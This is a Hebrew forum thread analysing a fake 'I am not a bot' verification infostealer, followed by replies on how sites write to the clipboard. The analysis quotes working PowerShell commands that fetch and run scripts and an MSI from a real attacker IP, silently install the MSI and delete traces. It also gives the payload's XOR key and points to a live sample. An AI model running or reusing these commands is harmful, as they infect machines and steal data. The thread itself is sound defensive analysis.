שיתוף | בואו נהנדס לאחור וירוס (שימו לב לא להוריד קבצים משרשור זה)
-
שימו לב בשרשור זה מובאים קבצים מסוכנים! נלקחו לא מעט צעדים כדי לסננם ולהגן עליהם מפני הורדה מוטעת
אך עדיין חובת האזהרה כאן
בהמשך לשרשור הזה, הבאתי כאן את עיקרי הדברים ממה שעברתי על הוירוס.
אז בואו נעשה סדר בתהליך התקיפה, שלב אחר שלב.
שלב 1: ההדבקה/ההידבקות הראשונית.
הכל מתחיל כשהקורבן מתבקש באתר לאמת את זהותו על ידי הדבקת פקודה לחלון
Win + R.
הפקודה הזאת זה ההתחלה:powershell -wi mi (.'powershell' (. 'wget' -usebas '84.21.189.171:5506/clo.txt'));I am not a bot - Verification ID: #8626 )הפקודה הזו מריצה PowerShell בחלון מוסתר (
-wi mi) ומורידה ומפעילה תוכן מקובץclo.txtמהשרת של התוקף.בתוך הקובץ
clo.txtאנו מוצאים את הקוד הבא:$u='http://84.21.189.171:5506/wir.txt' $i='Invoke-WebRequest' $e='Invoke-Expression' $r=& $i -Uri $u -UseBasicParsing & $e $r.Contentהסקריפט הזה פשוט מוריד ומריץ את השלב הבא בשרשרת: הקובץ
wir.txt.
הקובץwir.txtמכיל את הקוד הסופי של שלב ההדבקה:&{$u='http://84.21.189.171:5506/JDYQAKRR.msi';$p="$env:TEMP\s$(Get-Random).msi";(New-Object Net.WebClient).DownloadFile($u,$p);Start-Process msiexec.exe -Args @('/i',"`"$p`"",'/qn','/norestart') -WindowStyle Hidden -Wait;Remove-Item $p -Force}הסקריפט הזה מוריד קובץ
JDYQAKRR.msiלתיקיית ה-TEMP תחת שם אקראי, מתקין אותו בשקט (/qn) ובחלון מוסתר, ואז מוחק את קובץ ההתקנה כדי לטשטש עקבות.
עכשיו אנחנו מגיעים לחלק עם הבשר הווירוס עצמו.שלב 2: במבט מלמעלה
הנה הקובץ בשביל מי שרוצה, סיסמה
infected
malware_sample.msi.7zזהירות קובץ מסוכן!!
לאחר חילוץ ה-MSI, מתגלה לנו מבנה התיקיות הבא:
msi-extracted │ malware_sample.msi │ └───Layperson Cieg.keac Croort.jga D_Droid.exe mfc110u.dll MSVCP110.dll MSVCR110.dll sciter32.dll zpsres.US.dllמה שישר תופס את תשומת הלב זהו הקובץ
D_Droid.exe. החשד המיידי נפל עליו.
העלאתו ל-VirusTotal מגלה שהוא חומק בקלות רבה מאנטי-וירוסים שונים. דבר מדאיג ומזר בהחלט (לפחות בהווא אמינא).עכשיו ביליתי לא מעט זמן עובר על הקובץ מוצא לופים של הצפנה והרגשתי קרוב,
למרות זאת לא מצאתי שום דבר אמיתי ממה שחיפשתי לא הרצה של payload לא קריאות מוזרות לשרתים, כלום.בנוסף על כול זה גם virustotal החזיר בדיקה נקייה,
בשלב הזה בדקתי את הפרטים של הקובץ וראיתי להפתעתי שהקובץ חתום ומסתבר שהוא איננו זדוני.
כך שסתם ביזבזתי את הזמן עליו (נלמד להבא...)למעשה מבדיקה קלה של הקובץ אנחנו יכולים לראות שיש לנו עסק
עם תוכנה חתומה ורגילה בשםZoner Photo Studio 18אז אחרי כול זה (שמסתבר שעקבתי אחרי המפתחות רישיון של התוכנה במקום את של הוירוס).
שלב 3: אז איפה הוירוס נמצא?
עכשיו ששללנו את הexe,
מה שהוביל אותי למסקנה שהוירוס טמון כנראה בדבר שנקרא dll swapping (החלפת dll)
בעיה שמשפיעה גם בוירוסים וגם תוקפת בחוזקה כאשר מפתחים קיוסק תורני.כלומר יש קובץ dll זדוני בתוך הקבצים שלנו שמתחזה לאחד מהקבצים הרגילים כך
שברגע שהתוכנה קוראת לו הוא נכנס לפעולה ומפעיל את השלב הבא של הוירוס,
זה אומר שיש כאן מתחזה, השאלה היא רק מי הוא.בהסתכלות על מערכת הקבצים אנחנו יכולים לראות מספר דברים:
MSVCP110.dll,MSVCR110.dll: קבצי סביבת ריצה סטנדרטיים של ++C (MFC ו).sciter32.dll: ספרייה לרינדור ממשקי משתמש מבוססי HTML.zpsres.US.dll: קובץ משאבים של התוכנה. (וגם מכיל תמונה מוזרה של תוכי משום מה!
)mfc110u.dll: זהו קובץ השייך לספריית MFC של מיקרוסופט. שבמבט ראשון נראה תקין, אבל בבדיקה מעמיקה יותר, מתגלה שהקובץ אכן חתום אבל פגום, והחתימה שווה כקליפת השום.
למעשה גיליתי שהחתימה שלו לא תקפה רק בשלב יותר מאוחר אבל השארתי את זה כאן כדי לשמור על סדר
- יש את שני הקבצים
Croort.jga(21KB) וCieg.keac(2.5mb) שניהם מהסתכלות מלמעלה נראים מוזרים,
הקובץ מחתחיל עם לא מעט מחרוזות טקסט חסרות פשר ואז מגיע למקטע IDAT (מקטע מידע בקובץ Png),
סריקה בbinwalker לא הולידה פירות כך שאנחנו מתעסקים כנראה עם קובץ מוצפן או לא מוגדר (סריקת entropy מראה על נתונים סבירים אבל היא משתנה ברגע שמורידים את כול הטקסט בהתחלה).
מה שמוביל להנחה שהם השלב הבא.
שלב 4: פענוח הPayload
כדי לפענח אותם, יצרתי סקריפט עם ai שסורק קומבינציות הצפנה שונות בחיפוש אחר המחרוזת
http://. הסריקה העלתה שהקבצים "הוצפנו" באמצעות XOR, והמפתח הואF9A7E67E.לאחר הפענוח, קיבלנו קובץ שמכיל בתחילתו את הטקסט המוכר:
"This program cannot be run in DOS mode". זוהי אינדיקציה ברורה שאנחנו מתעסקים עם קובץ הרצה (EXE או DLL וטכנית גם sys). למרות זאת, הקובץ המפוענח עדיין לא מזוהה למרות שסוגרים אותו וכו'.אז עד כאן הגעתי איתרתי לא מעט כתובות שהתוכנה קוראת להם חלקם לא רשומות וחלקם לא זמינות לפחות ממה שניסיתי.
אני ישתדל להמשיך את המחקר בזה מי שרוצה מוזמן להמשיך פה בנושא בהצלחה.
ניתוח הפעילות מתוך vitus total:
ניתוח התנהגותי של הווירוס בסביבה מבוקרת (Sandbox) חושף את היכולות האמיתיות שלו. הנה פירוט הטכניקות שזוהו, לפי מודל MITRE ATT&CK:
קטגוריה (Tactic) טכניקה (Technique) מזהה תיאור Persistence (התמדה) Pre-OS Boot: Bootkit T1542.003 הווירוס משתמש ב- bcdedit.exeכדי לשנות את הגדרות האתחול של Windows, מה שמאפשר לו לרוץ לפני שמערכת ההפעלה עולה במלואה ולהשיג שליטה עמוקה.Privilege Escalation (הסלמת הרשאות) Process Injection T1055 כותב קוד לתוך הזיכרון של תהליכים אחרים (כמו rundll32.exe) כדי להריץ קוד זדוני בהקשר של תהליך לגיטימי.Defense Evasion (התחמקות מהגנות) System Binary Proxy Execution T1218 מריץ DLL זדוני ( sciter.dllבמקרה שזוהה) באמצעות תהליך מערכת לגיטימי כמוrundll32.exeכדי להסוות את פעילותו.Virtualization/Sandbox Evasion T1497 בודק אם הוא רץ בסביבת ניתוח (Sandbox) או תחת Debugger כדי להימנע מגילוי. Impair Defenses T1562 עלול לנסות להשבית או לפגוע בכלי אבטחה קיימים במערכת. Discovery (גילוי) Process Discovery T1057 סורק תהליכים רצים במערכת, כנראה כדי לאתר תהליכי אבטחה או כדי להזריק קוד לתהליכים ספציפיים. Command and Control (שליטה ובקרה) Application Layer Protocol T1071 משתמש בפרוטוקולי רשת סטנדרטיים (כמו HTTP) כדי לתקשר עם שרתי השליטה והבקרה שלו. סיכום
זוהי מתקפה די ידועה ודי אפקטיבית אם נפלתם בה ההמלצה המידית היא לכבות את המחשב לגבות את כול הנתונים מגרסת live ולפרמט,
במידה ואין לכם ידיעה בדבר יש לפנות לבעל מקצוע.TL;DR/אמלוק
וירוס infostealer סטנדרטי
אהבתי את איך שהוא הזריק את עצמו יש טיפה fuzzing
לא יודע אם זה עקיצה מכוונת שהשם של התיקייה זה layperson
סך הכול נחמד יש עוד לראות ולבדוק מוזמנים.כתבתי לבד עשית שיפצור לפוסט עם ai
אם יש טעויות זה לא אני
זה הוא -
@cfopuser השאלה היא איך בכניסה לאתר הוא מטמיע את התוכן של ההדבקה ללוח ההעתקות שלך?
אשריך!מכל הסקירה הבאמת מושקעת ומעניינת הזו הדבר שהכי תפס אותי זה החרוז
-
@אברהם-גלסר למעשה די פשוט. כמו כל לחצן העתקה בכל אתר...
אני לא יודע איזה קוד בדיוק עומד מאחורי זה, אבל זה קיים בכל כך הרבה אתרים לגיטמיים@מישהו12 השאלה אם באופן אוטומטי כשאתה נכנס לאתר הוא מטמיע לך את הקוד בלוח ההעתקות או שאתה צריך ללחוץ על כפתור העתק או משהו כזה?
-
@מישהו12 השאלה אם באופן אוטומטי כשאתה נכנס לאתר הוא מטמיע לך את הקוד בלוח ההעתקות או שאתה צריך ללחוץ על כפתור העתק או משהו כזה?
כתב בשיתוף | בואו נהנדס לאחור וירוס (שימו לב לא להוריד קבצים משרשור זה):
אני לא יודע איזה קוד בדיוק עומד מאחורי זה
אבל זה לא משנה יותר מידי את התמונה. אותו קוד שמשמש באתרים לגיטימיים ללחצן העתקה, יכול לרוץ כאן ברקע בשקט בזמן שהאתר נפתח
-
@מישהו12 השאלה אם באופן אוטומטי כשאתה נכנס לאתר הוא מטמיע לך את הקוד בלוח ההעתקות או שאתה צריך ללחוץ על כפתור העתק או משהו כזה?
כתב בשיתוף | בואו נהנדס לאחור וירוס (שימו לב לא להוריד קבצים משרשור זה):
@מישהו12 השאלה אם באופן אוטומטי כשאתה נכנס לאתר הוא מטמיע לך את הקוד בלוח ההעתקות או שאתה צריך ללחוץ על כפתור העתק או משהו כזה?
?
-
כתב בשיתוף | בואו נהנדס לאחור וירוס (שימו לב לא להוריד קבצים משרשור זה):
@מישהו12 השאלה אם באופן אוטומטי כשאתה נכנס לאתר הוא מטמיע לך את הקוד בלוח ההעתקות או שאתה צריך ללחוץ על כפתור העתק או משהו כזה?
?
@אברהם-גלסר או שזה קורה באופן אוטומטי, וזה יכול להיות גם פונקציית משנה לכפתור אחר כלשהו...
-
@mfmf כבר נכתב פה למעלה. תסתכל.
-
כתב בשיתוף | בואו נהנדס לאחור וירוס (שימו לב לא להוריד קבצים משרשור זה):
אני לא יודע איזה קוד בדיוק עומד מאחורי זה
אבל זה לא משנה יותר מידי את התמונה. אותו קוד שמשמש באתרים לגיטימיים ללחצן העתקה, יכול לרוץ כאן ברקע בשקט בזמן שהאתר נפתח
-
@DANIEL-4 האמת שזה דווקא כן חלק מהנושא. זה השלב הראשוני של הנדוס הווירוס לאחור...
-
@DANIEL-4 האמת שזה דווקא כן חלק מהנושא. זה השלב הראשוני של הנדוס הווירוס לאחור...
@אברהם-גלסר לא הבנתי?
אני מתכוון החלק של שידור ההעתקה ללוח שלך
כעיקרון כרום אמור לקבל ממך הרשאה לזה [או שאצלי יש UAC מוקפד יותר?] אחרת הוא לא אמור לאפשר העתקות כאלו.... -
@אברהם-גלסר לא הבנתי?
אני מתכוון החלק של שידור ההעתקה ללוח שלך
כעיקרון כרום אמור לקבל ממך הרשאה לזה [או שאצלי יש UAC מוקפד יותר?] אחרת הוא לא אמור לאפשר העתקות כאלו....@DANIEL-4 יכול להיות גם שכשאתה לוחץ על כפתור אימות "אני לא רובוט" הוא מבצע את ההעתקה כי הייתה התממשקות בינך ובין האתר שבה הוא יכל להזריק לך את זה...
-
@DANIEL-4 יכול להיות גם שכשאתה לוחץ על כפתור אימות "אני לא רובוט" הוא מבצע את ההעתקה כי הייתה התממשקות בינך ובין האתר שבה הוא יכל להזריק לך את זה...
@אברהם-גלסר חלקית - רק אם זה מבוסס על איתור פעולה
לא אם דובר על דרישה להרשאה אקטיבית -
@אברהם-גלסר לא הבנתי?
אני מתכוון החלק של שידור ההעתקה ללוח שלך
כעיקרון כרום אמור לקבל ממך הרשאה לזה [או שאצלי יש UAC מוקפד יותר?] אחרת הוא לא אמור לאפשר העתקות כאלו.... -
@DANIEL-4 כתב בשיתוף | בואו נהנדס לאחור וירוס (שימו לב לא להוריד קבצים משרשור זה):
כעיקרון כרום אמור לקבל ממך הרשאה לזה
לא.
הוא צריך הרשאה לקרוא את הלוח, לא לכתוב ללוח. -
@י.-פל. כתב בשיתוף | בואו נהנדס לאחור וירוס (שימו לב לא להוריד קבצים משרשור זה):
לקרוא את הלוח
וגם זה רק בשביל להדביק תוכן מעוצב וכדו' שצריך ממש לקרוא את התוכן, לא בשביל הדבקה רגילה
@ע-ה-דכו-ע כתב בשיתוף | בואו נהנדס לאחור וירוס (שימו לב לא להוריד קבצים משרשור זה):
וגם זה רק בשביל להדביק תוכן מעוצב וכדו' שצריך ממש לקרוא את התוכן, לא בשביל הדבקה רגילה
מה פתאום
הוא יכול רק לבקש ממך ללחוץ Ctrl+V
או להשתמש ב API של הדבקה שיקפיץ בקשת הרשאה
 { const baseUrl = "https://www.google.co.il/search?q=site:mitmachim.top"; const m = location.pathname.match(/^\/(topic|category)\/(\d+)/); const type = m ? m[1] : null; const id = m ? m[2] : null; let searchInput; function search(path = "") { const query = searchInput.value.trim(); if (query) { window.open(`${baseUrl}${path}%20${encodeURIComponent(query)}`, "_blank"); } } let buttons = {}; buttons.searchAll = { id: "bb-search-all", label: `חיפוש ${type ? "בכל הפורום" : ""}`, className: type ? "btn-secondary" : "btn-primary", callback: () => search(), }; if (type === "topic") { buttons.searchTopic = { label: "חיפוש בנושא זה", className: "btn-primary", callback: () => search(`/topic/${id}`), }; } else if (type === "category") { buttons.searchCategory = { label: "חיפוש בקטגוריה זו", className: "btn-primary", callback: () => search(`/category/${id}`), }; } buttons.cancel = { label: "ביטול", className: "btn-default", "data-bs-dismiss": "modal" }; const dialog = bootbox.dialog({ title: '<div style="text-align:center;"><img src="/assets/uploads/files/1625950269825-mt-google.png" width="400" alt="חיפוש בגוגל"></div>', message: '<input id="bb-inp" class="bootbox-input bootbox-input-text form-control" placeholder="הקלידו כדי לחפש בגוגל" autocomplete="off"/>', buttons, backdrop: true, show: true, onEscape: true }); dialog.on("shown.bs.modal", function () { searchInput = document.getElementById("bb-inp"); if (searchInput) { searchInput.focus(); searchInput.addEventListener("keydown", function (e) { if (e.key === "Enter") { e.preventDefault(); const query = this.value.trim(); if (query) { search(); dialog.modal("hide"); } } else if (e.key === "Escape") { e.preventDefault(); dialog.modal("hide"); } }); } const searchAllButton = document.getElementById("bb-search-all"); if (searchAllButton) { searchAllButton.title = "לחצו על אנטר כדי לחפש"; } }); })(); void 0;){kind=link}